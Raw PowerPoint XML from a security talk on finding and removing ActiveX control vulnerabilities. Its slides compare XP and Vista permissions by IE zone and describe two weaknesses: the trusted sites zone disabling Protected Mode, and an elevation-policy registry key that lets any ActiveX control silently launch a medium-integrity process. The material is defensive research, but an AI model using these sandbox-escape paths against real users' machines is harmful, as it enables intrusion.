        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="989013" y="3136900"/>
          <a:ext cx="8856662" cy="2072491"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1">
                <a:tableStyleId>{3C2FFA5D-87B4-456A-9821-1D502468CF0F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1476375"/>
                <a:gridCol w="1476375"/>
                <a:gridCol w="1474787"/>
                <a:gridCol w="1476375"/>
                <a:gridCol w="1476375"/>
                <a:gridCol w="1476375"/>
              </a:tblGrid>
              <a:tr h="7207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굴림" pitchFamily="50" charset="-127"/>
                        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104287" marR="104287" marT="52144" marB="52144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8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File </a:t>
                      </a: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8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Writing</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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굴림" pitchFamily="50" charset="-127"/>
                        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104287" marR="104287" marT="52144" marB="52144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8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Registry Writing</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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굴림" pitchFamily="50" charset="-127"/>
                        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104287" marR="104287" marT="52144" marB="52144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Process Execution</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104287" marR="104287" marT="52144" marB="52144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8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File Reading</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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굴림" pitchFamily="50" charset="-127"/>
                        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104287" marR="104287" marT="52144" marB="52144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8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Registry Reading</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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굴림" pitchFamily="50" charset="-127"/>
                        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104287" marR="104287" marT="52144" marB="52144" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="7207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8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XP</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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굴림" pitchFamily="50" charset="-127"/>
                        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104287" marR="104287" marT="52144" marB="52144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8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O</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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accent1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="굴림" pitchFamily="50" charset="-127"/>
                        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104287" marR="104287" marT="52144" marB="52144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8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O</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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accent1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="굴림" pitchFamily="50" charset="-127"/>
                        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104287" marR="104287" marT="52144" marB="52144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8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O</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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accent1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="굴림" pitchFamily="50" charset="-127"/>
                        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104287" marR="104287" marT="52144" marB="52144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8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O</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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accent1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="굴림" pitchFamily="50" charset="-127"/>
                        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104287" marR="104287" marT="52144" marB="52144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8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O</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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accent1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="굴림" pitchFamily="50" charset="-127"/>
                        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104287" marR="104287" marT="52144" marB="52144" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="63104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8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Vista</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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굴림" pitchFamily="50" charset="-127"/>
                        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104287" marR="104287" marT="52144" marB="52144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8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X</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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accent1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="굴림" pitchFamily="50" charset="-127"/>
                        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104287" marR="104287" marT="52144" marB="52144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X</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="굴림" pitchFamily="50" charset="-127"/>
                        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104287" marR="104287" marT="52144" marB="52144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8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X</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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accent1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="굴림" pitchFamily="50" charset="-127"/>
                        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104287" marR="104287" marT="52144" marB="52144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8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O</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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accent1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="굴림" pitchFamily="50" charset="-127"/>
                        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104287" marR="104287" marT="52144" marB="52144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O</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="굴림" pitchFamily="50" charset="-127"/>
                        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104287" marR="104287" marT="52144" marB="52144" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame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슬라이드 번호 개체 틀 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4051300" y="7237413"/>
            <a:ext cx="2493963" cy="32385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1306" tIns="45654" rIns="91306" bIns="45654"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{BA9AA466-BAAA-49C4-8D37-C99AA808569E}" type="slidenum">
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:pPr latinLnBrk="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:defRPr/>
              </a:pPr>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339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ko-KR" dirty="0" smtClean="0"/>
              <a:t>Outline of This Talk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340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/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Introduction to an ActiveX control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Potentially vulnerable ActiveX controls identification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>DBCS(Double Byte Character Sets) and universal exploit code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Windows Vista and ActiveX control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Goal : Identify and remove ActiveX control vulnerabilities before bad guys misuse them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C32285E-CEE4-4589-A757-7892803E6A40}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4505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ko-KR" dirty="0" smtClean="0"/>
              <a:t>Trusted sites zone</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4506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ko-KR" dirty="0" smtClean="0"/>
              <a:t>When a user visits web sites in a trusted sites zone, Protected Mode will be turned off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>If developers add their web sites to a trusted sites zone,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>ActiveX control can do everything in trusted web sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Attacker can misuse XSS vulnerabilities of trusted web sites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Group 118"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="989013" y="4049523"/>
          <a:ext cx="8856000" cy="2160000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1">
                <a:tableStyleId>{3C2FFA5D-87B4-456A-9821-1D502468CF0F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1476000"/>
                <a:gridCol w="1476000"/>
                <a:gridCol w="1476000"/>
                <a:gridCol w="1476000"/>
                <a:gridCol w="1476000"/>
                <a:gridCol w="1476000"/>
              </a:tblGrid>
              <a:tr h="720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굴림" pitchFamily="50" charset="-127"/>
                        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104287" marR="104287" marT="52144" marB="52144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File </a:t>
                      </a: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Writing</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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굴림" pitchFamily="50" charset="-127"/>
                        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104287" marR="104287" marT="52144" marB="52144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Registry Writing</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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굴림" pitchFamily="50" charset="-127"/>
                        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104287" marR="104287" marT="52144" marB="52144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Process Execution</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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굴림" pitchFamily="50" charset="-127"/>
                        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104287" marR="104287" marT="52144" marB="52144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File Reading</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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굴림" pitchFamily="50" charset="-127"/>
                        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104287" marR="104287" marT="52144" marB="52144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Registry Reading</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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굴림" pitchFamily="50" charset="-127"/>
                        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104287" marR="104287" marT="52144" marB="52144" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="720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Internet zone</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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굴림" pitchFamily="50" charset="-127"/>
                        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104287" marR="104287" marT="52144" marB="52144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X</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="굴림" pitchFamily="50" charset="-127"/>
                        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104287" marR="104287" marT="52144" marB="52144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X</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="굴림" pitchFamily="50" charset="-127"/>
                        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104287" marR="104287" marT="52144" marB="52144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X</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="굴림" pitchFamily="50" charset="-127"/>
                        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104287" marR="104287" marT="52144" marB="52144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O</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="굴림" pitchFamily="50" charset="-127"/>
                        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104287" marR="104287" marT="52144" marB="52144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O</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="굴림" pitchFamily="50" charset="-127"/>
                        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104287" marR="104287" marT="52144" marB="52144" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="720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Trusted Sites zone</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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굴림" pitchFamily="50" charset="-127"/>
                        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104287" marR="104287" marT="52144" marB="52144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O</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="굴림" pitchFamily="50" charset="-127"/>
                        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104287" marR="104287" marT="52144" marB="52144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O</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="굴림" pitchFamily="50" charset="-127"/>
                        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104287" marR="104287" marT="52144" marB="52144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O</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="굴림" pitchFamily="50" charset="-127"/>
                        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104287" marR="104287" marT="52144" marB="52144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O</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="굴림" pitchFamily="50" charset="-127"/>
                        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104287" marR="104287" marT="52144" marB="52144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O</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR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1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="굴림" pitchFamily="50" charset="-127"/>
                        <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104287" marR="104287" marT="52144" marB="52144" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame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CBE0C79-F4C8-498A-A31B-E0BF1B20582C}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4608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ko-KR" dirty="0" smtClean="0"/>
              <a:t>Silent Execution of a Medium Integrity Process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4608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ko-KR" dirty="0" smtClean="0"/>
              <a:t>If a developer creates an elevation policy for a process, any ActiveX control can execute it silently with medium integrity </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0"/>
              <a:t>Elevation Policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="F:\elevation policy.bmp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346303" y="2923375"/>
            <a:ext cx="6715171" cy="4182324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="사각형 설명선 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2917808" y="4780763"/>
            <a:ext cx="6858048" cy="714380"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25876"/>
              <a:gd name="adj2" fmla="val -149915"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln>
            <a:noFill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ko-KR" sz="20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Arial" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Any ActiveX control can execute Acrobat Elements.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>with medium integrity</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="20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Arial" charset="0"/>
              <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="직사각형 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5846766" y="3923507"/>
            <a:ext cx="2786082" cy="214314"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3492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en-US" sz="2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굴림" pitchFamily="50" charset="-127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1489048" y="6066647"/>
            <a:ext cx="1048360" cy="408623"/>
          </a:xfrm>
          <a:prstGeom prst="round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altLang="ko-KR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>ActiveX</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="75000"/>
                </a:schemeClr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233911F-8A1F-4C8B-AEEA-148662EADB72}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4813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ko-KR" dirty="0" smtClean="0"/>
              <a:t>Intended Scenario Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4813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ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>ActiveX control creates a user-specific configuration file in a low integrity folder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>ActiveX control silently executes the medium integrity process under the elevation policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>The process copies the configuration file into an user’s folder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" smtClean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274734" y="6566713"/>
            <a:ext cx="7858180" cy="408623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altLang="ko-KR" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Vista</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="18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346172" y="6066647"/>
            <a:ext cx="3214710" cy="408623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altLang="ko-KR" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Low integrity folder</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="18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632320" y="6066647"/>
            <a:ext cx="3286148" cy="408623"/>
          </a:xfrm>
          <a:prstGeom prst="round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altLang="ko-KR" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>User’s folder(medium)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="18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061344" y="6066647"/>
            <a:ext cx="428628" cy="408623"/>
          </a:xfrm>
          <a:prstGeom prst="round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altLang="ko-KR" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="18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632848" y="6066647"/>
            <a:ext cx="214314" cy="387191"/>
          </a:xfrm>
          <a:prstGeom prst="round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altLang="ko-KR" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="18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990038" y="6066647"/>
            <a:ext cx="71438" cy="387191"/>
          </a:xfrm>
          <a:prstGeom prst="round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endParaRPr lang="ko-KR" altLang="en-US" sz="18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989114" y="4280697"/>
            <a:ext cx="1857388" cy="340519"/>
          </a:xfrm>
          <a:prstGeom prst="round2Diag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ko-KR" sz="1400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Configuration file</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg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4" name="곱셈 기호 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4703758" y="5280829"/>
            <a:ext cx="1857388" cy="1571636"/>
          </a:xfrm>
          <a:prstGeom prst="mathMultiply">
            <a:avLst>
              <a:gd name="adj1" fmla="val 11000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln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en-US" sz="2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굴림" pitchFamily="50" charset="-127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846238" y="3994945"/>
